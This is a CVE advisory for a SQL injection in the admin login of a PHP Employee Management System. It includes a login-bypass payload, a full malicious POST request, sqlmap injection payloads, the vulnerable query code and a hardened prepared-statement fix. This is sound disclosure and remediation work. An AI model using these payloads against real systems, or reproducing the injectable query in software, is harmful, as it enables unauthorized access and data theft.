CVE-2022-2724: PHP code audit - Employee Management System aprocess.php SQL Injection

A vulnerability was found in SourceCodester Employee Management System and has been declared critical. An unknown function of the file /process/aprocess.php is affected. Manipulation of the argument mailuid leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205837 was assigned to this vulnerability.


SourceCodester Employee Management System aprocess.php SQL Injection

Vendor Homepage:

https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html

Source Code Download:

https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip

Proof of Concept

Step 1: Open the URL http://127.0.0.1/ems/alogin.html

Step 2: Use the payload admin' or 1 # in Email and anything in Password

Step 3: The login succeeds

Malicious request:

POST /ems/process/aprocess.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
Referer: http://192.168.88.195/ems/alogin.html
Accept-Encoding: gzip, deflate
Connection: close

mailuid=admin' or 1 #&pwd=123&login-submit=Login

Sqlmap output:

Parameter: mailuid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: mailuid=-6002' OR 3766=3766#&pwd=123&login-submit=Login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: mailuid=admin' AND (SELECT 4206 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4206=4206,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sPJa&pwd=123&login-submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mailuid=admin' AND (SELECT 1085 FROM (SELECT(SLEEP(5)))gGqt)-- XrcV&pwd=123&login-submit=Login

Vulnerable code

/process/aprocess.php, lines 5-12:

// Request parameters are read as-is: no validation, escaping or type check.
$email = $_POST['mailuid'];
$password = $_POST['pwd'];

// Both values are interpolated straight into the query string. A single quote
// in mailuid closes the email literal, and everything after it (for example
// "or 1 #") is parsed as SQL; the trailing "#" comments out the password check.
// The submitted password is also compared directly against the stored column.
$sql = "SELECT * from `alogin` WHERE email = '$email' AND password = '$password'";

//echo "$sql";

$result = mysqli_query($conn, $sql);
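The fix is to stop building the query from request data. The following is an added example of a hardened replacement for the lines above; it is not code from the project. It assumes $conn is an open mysqli connection and that the alogin.password column stores a password_hash() digest rather than the plaintext the original compares against.

```php
<?php
// Hardened login for /process/aprocess.php (added example, not project code).
// Assumptions: $conn is an open mysqli connection; `alogin`.`password` holds
// a password_hash() digest.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Authenticate an admin by email and password.
 * Returns the matching row (without the hash) on success, null on failure.
 */
function authenticateAdmin(mysqli $conn, string $email, string $password): ?array
{
    // Reject values that cannot be an address before touching the database;
    // "admin' or 1 #" fails here already.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // The query text and the parameter travel separately, so a quote or a
    // comment marker inside $email is compared as data, never parsed as SQL.
    $stmt = $conn->prepare('SELECT * FROM `alogin` WHERE email = ? LIMIT 1');
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Same null result for unknown email and wrong password, so the response
    // does not reveal which accounts exist.
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

$email    = $_POST['mailuid'] ?? '';
$password = $_POST['pwd'] ?? '';

$admin = authenticateAdmin($conn, $email, $password);
if ($admin === null) {
    http_response_code(401);
    exit('Invalid credentials');
}
// Continue with session setup for $admin here.
```

With this in place the sqlmap payloads listed above are bound as a literal email string and match no row, and the error-based payload can no longer trigger a MySQL error message that leaks query results.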
